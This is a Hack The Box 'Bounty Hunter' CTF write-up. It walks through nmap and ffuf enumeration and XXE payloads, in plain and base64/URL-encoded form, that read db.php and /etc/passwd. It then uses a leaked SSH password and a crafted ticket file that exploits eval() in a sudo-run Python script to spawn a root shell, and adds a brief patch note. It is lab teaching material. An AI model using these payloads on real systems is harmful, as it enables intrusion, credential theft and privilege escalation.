Bounty Hunter Hackthebox Writeup


Nmap

as usual,, I am always starting with the Nmap scan 

 # Nmap 7.80 scan initiated Sun Jul 25 09:14:32 2021 as: nmap -sV -sC -vv -oN nmap 10.10.11.100  
 Nmap scan report for 10.10.11.100  
 Host is up, received echo-reply ttl 63 (0.28s latency).  
 Scanned at 2021-07-25 09:14:33 IST for 25s  
 Not shown: 998 closed ports  
 Reason: 998 resets  
 PORT  STATE SERVICE REASON     VERSION  
 22/tcp open ssh   syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)  
 80/tcp open http  syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))  
 |_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA  
 | http-methods:   
 |_ Supported Methods: GET HEAD POST OPTIONS  
 |_http-server-header: Apache/2.4.41 (Ubuntu)  
 |_http-title: Bounty Hunters  
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  
 Read data files from: /usr/bin/../share/nmap  
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
 # Nmap done at Sun Jul 25 09:14:58 2021 -- 1 IP address (1 host up) scanned in 25.85 seconds  


Only two ports are opened 

22 is ssh

80 is http

ENUMERATION

first,, we check port 80 whats inside

I am using ffuf for directory brute forcing you also can use gobuster,wfuzz whatever you want... :)




No cms its simple bootstrap site

so

I am using ffuf for directory brute forcing you also can use gobuster,wfuzz whatever you want... :)

FFUF

     /'___\ /'___\      /'___\      
     /\ \__/ /\ \__/ __ __ /\ \__/      
     \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\     
     \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/     
      \ \_\  \ \_\ \ \____/ \ \_\      
      \/_/  \/_/  \/___/  \/_/      
     v1.3.1-dev  
 ________________________________________________  
  :: Method      : GET  
  :: URL       : http://10.10.11.100/FUZZ  
  :: Wordlist     : FUZZ: /usr/share/wordlists/common.txt  
  :: Extensions    : .php   
  :: Follow redirects : false  
  :: Calibration   : false  
  :: Timeout     : 10  
  :: Threads     : 40  
  :: Matcher     : Response status: 200,204,301,302,307,401,403,405  
 ________________________________________________  
 .php          [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 410ms]  
             [Status: 200, Size: 25169, Words: 10028, Lines: 389, Duration: 409ms]  
 .htpasswd.php      [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 3520ms]  
 .htaccess        [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 4702ms]  
 .htaccess.php      [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 4703ms]  
 .hta.php        [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 4702ms]  
 .htpasswd        [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 4703ms]  
 .hta          [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 4702ms]  
 assets         [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 237ms]  
 css           [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 408ms]  
 db.php         [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 515ms]  
 index.php        [Status: 200, Size: 25169, Words: 10028, Lines: 389, Duration: 611ms]  
 index.php        [Status: 200, Size: 25169, Words: 10028, Lines: 389, Duration: 412ms]  
 js           [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 613ms]  
 portal.php       [Status: 200, Size: 125, Words: 11, Lines: 6, Duration: 251ms]  
 resources        [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 613ms]  
 server-status      [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 291ms]  
 sakthi@debian:~/hacking/htb/bounty-hunter$   

lots of files are there 



portal.php is under development ok... and I follow that link



Bounty report system beta yep its under development 

I tried SQL injections nothing work so I see the request found something interesting



whats is the data header .. its a base64 encoded text 

so I decided to decode that text finally 

 its looks like this


 <?xml version="1.0" encoding="ISO-8859-1"?>  
           <bugreport>  
           <title></title>  
           <cwe></cwe>  
           <cvss></cvss>  
           <reward></reward>  
           </bugreport>  

XML?

ok I decided to do some xxe injections 

what is xxe injection?

XML injection manipulates or compromises the logic of an XML application or service. The injection of unintended XML content and/or structures into an XML message can alter the intended logic of an application

It also referred to xxe entity injection 

for more 

referred this blog

#synack

and also watch DevOps IPSec video, IPSec clearly explained on DevOps machine

#video-reference

I tried some payload form payload-all-the-things


 <?xml version="1.0"?>  
 <!DOCTYPE foo [  
 <!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>  
 <foo><result>&ac;</result></foo>  

  it's an example payload from  payload-all-the-things

I edit that payload to, our machine

finally its look like this

SPOILER ALERT 

 <?xml version="1.0" encoding="ISO-8859-1"?>  
 <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=db.php">]>  
           <bugreport>  
           <title>&xxe;</title>  
           <cwe>no</cwe>  

why we read db.php?

because we access every file in thats machine(index.php,portal.php) but db.php is empty(not empty it's a pure PHP file so the browser didn't show it)

PHP was backend developed language :)

we need burp to perform this attack


look at data 

that value is base64+url encoded so we can also do this to our payload

finally, the payload looks like this



SPOILER ALERT

'image.png' failed to upload.

PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGZvbyBbIDwhRU5USVRZIHh4ZSBTWVNURU0gInBocDovL2ZpbHRlci9jb252ZXJ0LmJhc2U2NC1lbmNvZGUvcmVzb3VyY2U9ZGIucGhwIj4gXT4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT4meHhlOzwvdGl0bGU%2BCgkJPGN3ZT4meHhlOzwvY3dlPgoJCTxjdnNzPiZ4eGU7PC9jdnNzPgoJCTxyZXdhcmQ%2BJnh4ZTs8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4%3D



we have creds the user name admin is incorrect what is the username?

we grab the /etc/passwd file to find user names


 <?xml version="1.0" encoding="ISO-8859-1"?>  
 <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>  
           <bugreport>  
           <title>&xxe;</title>  
           <cwe>no</cwe>  
           <cvss>no</cvss>  
           <reward>no</reward>  
           </bugreport>  

the final payload looks like this (base64+urlencoded)


 PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGZvbyBbIDwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCI%2BIF0%2BCgkJPGJ1Z3JlcG9ydD4KCQk8dGl0bGU%2BJnh4ZTs8L3RpdGxlPgoJCTxjd2U%2Bbm88L2N3ZT4KCQk8Y3Zzcz5ubzwvY3Zzcz4KCQk8cmV3YXJkPm5vPC9yZXdhcmQ%2BCgkJPC9idWdyZXBvcnQ%2B  





Two users have shell

one is a root user

another user name is development

so I tried to login development user with that creds 

ssh development@10.10.11.100

password  m19RoAU0hP41A1sTsq6K

we successfully logged



How to patch that vulnerabilty?

simple just libxml_disable_entity_loader(false); to

libxml_disable_entity_loader(true);

because that machine accepts externally entity(XML) load without sanitize inuput 

file


PRIVILEGED ESCALATION

sudo -l


we can run a ticketValidator.py file in the root user 




so let's view the ticketValidator.py file 



CODE

 #Skytrain Inc Ticket Validation System 0.1  
 #Do not distribute this file.  
 def load_file(loc):  
   if loc.endswith(".md"):  
     return open(loc, 'r')  
   else:  
     print("Wrong file type.")  
     exit()  
 def evaluate(ticketFile):  
   #Evaluates a ticket to check for ireggularities.  
   code_line = None  
   for i,x in enumerate(ticketFile.readlines()):  
     if i == 0:  
       if not x.startswith("# Skytrain Inc"):  
         return False  
       continue  
     if i == 1:  
       if not x.startswith("## Ticket to "):  
         return False  
       print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")  
       continue  
     if x.startswith("__Ticket Code:__"):  
       code_line = i+1  
       continue  
     if code_line and i == code_line:  
       if not x.startswith("**"):  
         return False  
       ticketCode = x.replace("**", "").split("+")[0]  
       if int(ticketCode) % 7 == 4:  
         validationNumber = eval(x.replace("**", ""))  
         if validationNumber > 100:  
           return True  
         else:  
           return False  
   return False  
 def main():  
   fileName = input("Please enter the path to the ticket file.\n")  
   ticket = load_file(fileName)  
   #DEBUG print(ticket)  
   result = evaluate(ticket)  
   if (result):  
     print("Valid ticket.")  
   else:  
     print("Invalid ticket.")  
   ticket.close  
 main()  

this code asks for a file .md so make a file with .md extension and

that python code checks,,, 

if the condition is true that code opens the file search for the next condition, so we include the second condition as os.cmd(bash) to pop up a root shell

so that file.md look like

 # Skytrain Inc   
 ## Ticket to root  
 __Ticket Code:__  
 **102+ 10 == 112 and __import__('os').system('/bin/bash') == False  


We rooted :)


5 تعليقات

إرسال تعليق

أحدث أقدم

Smartphones

Post ADS 1

Advertisement

Post ADS 1